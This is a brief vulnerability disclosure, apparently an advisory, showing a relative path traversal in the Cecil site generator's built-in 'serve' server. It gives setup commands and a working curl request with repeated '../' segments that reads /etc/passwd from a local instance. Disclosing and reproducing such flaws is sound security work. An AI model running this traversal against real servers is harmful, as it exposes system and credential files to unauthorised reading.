When a Cecil site is served by cecil serve
, Relative Path Traversal is possible via the URI path.
Run the following commands:
mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve
Then curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd
.